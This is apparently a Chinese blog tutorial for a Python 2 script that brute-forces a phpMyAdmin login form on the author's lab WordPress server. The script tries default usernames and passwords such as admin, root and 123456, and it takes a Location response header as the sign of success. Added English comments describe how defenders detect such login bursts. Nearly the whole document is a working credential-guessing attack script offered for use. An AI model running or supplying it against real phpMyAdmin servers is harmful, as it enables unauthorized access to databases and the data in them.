上次搭建的 WordPress 网站新增加了 phpMyAdmin,这次使用 Python 对 phpMyAdmin 进行暴力破解。
代码如下:
#coding=utf-8
import requests
import re
# Example target from the author's lab setup (left commented out):
#url='http://192.168.72.131/phpMyAdmin/index.php'
# Read the phpMyAdmin login-page URL from the operator. The prompt literal
# ("please enter the url address") is decoded from UTF-8 and re-encoded as GBK
# before being shown -- presumably for a Chinese-locale Windows console; confirm.
# raw_input() and unicode() are Python 2 builtins, so the script is Python 2 only.
url=raw_input(unicode("请输入url地址:","utf-8").encode("gbk"))
def phpmyadmin_brute(url, username, password):
    """Submit one username/password pair to a phpMyAdmin login form.

    Sends a single form-encoded POST to ``url`` with redirect-following
    disabled and looks only at the response headers.

    Args:
        url: Address of the phpMyAdmin login page.
        username: Value sent in the ``pma_username`` form field.
        password: Value sent in the ``pma_password`` form field.

    Returns:
        The value of the ``location`` response header when a ``Location``
        key is present (a "cracked" line is printed first); otherwise a
        unicode string reporting the pair as wrong.

    Review notes:
        * A redirect header is the only success signal. The author states
          that this holds for the Linux-hosted target and cannot be relied
          on for a Windows-hosted one, so the printed result is a heuristic
          and not proof that the login was accepted.
        * The ``token`` field is a fixed literal copied into the script;
          whether the server accepts it is not checked here.
        * Seen from the server, every call is one POST to the login page
          carrying ``pma_username``/``pma_password``. Bursts of such
          requests from one client are what login throttling, log-based
          banning and restricting phpMyAdmin to trusted networks are
          meant to stop.
    """
    request_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    form_fields = {
        'pma_username': username,
        'pma_password': password,
        'server': '1',
        'token': '5b63cad7b0e116159262cb0a93ee3508',
    }
    # allow_redirects=False keeps the first response, so a redirect issued by
    # the login handler stays visible as a header instead of being followed.
    response = requests.post(
        url=url,
        data=form_fields,
        headers=request_headers,
        allow_redirects=False,
    )
    response_headers = response.headers

    # Guard clause: without a Location header the attempt is reported as wrong.
    if 'Location' not in response_headers.keys():
        return u'用户名%s,密码%s-----错误' % (username, password)

    print u'破解成功-----用户名%s,密码%s' % (username, password)
    # requests exposes headers through a case-insensitive mapping, so the
    # lower-case key retrieves the same header.
    return response_headers['location']
# Candidate account names and passwords. All are default or trivially
# guessable values -- the kind of credentials that should never remain on a
# database account reachable through a web login.
users=['admin','root','123456']
passes=['root','admin','123456']
# Try every pair (3 passwords x 3 users = 9 requests), passwords in the outer
# loop, and print whatever phpmyadmin_brute() returns for each pair.
# On the server side this appears as nine login POSTs in quick succession
# from one client, which is straightforward to spot in the web access log.
for password in passes:
    for username in users:
        print phpmyadmin_brute(url,username,password)
注意:这次暴力破解的目标运行在 Linux 上,判断是否爆破成功的依据是响应头里是否含有 Location;而在 Windows 上不能以此作为判断依据。

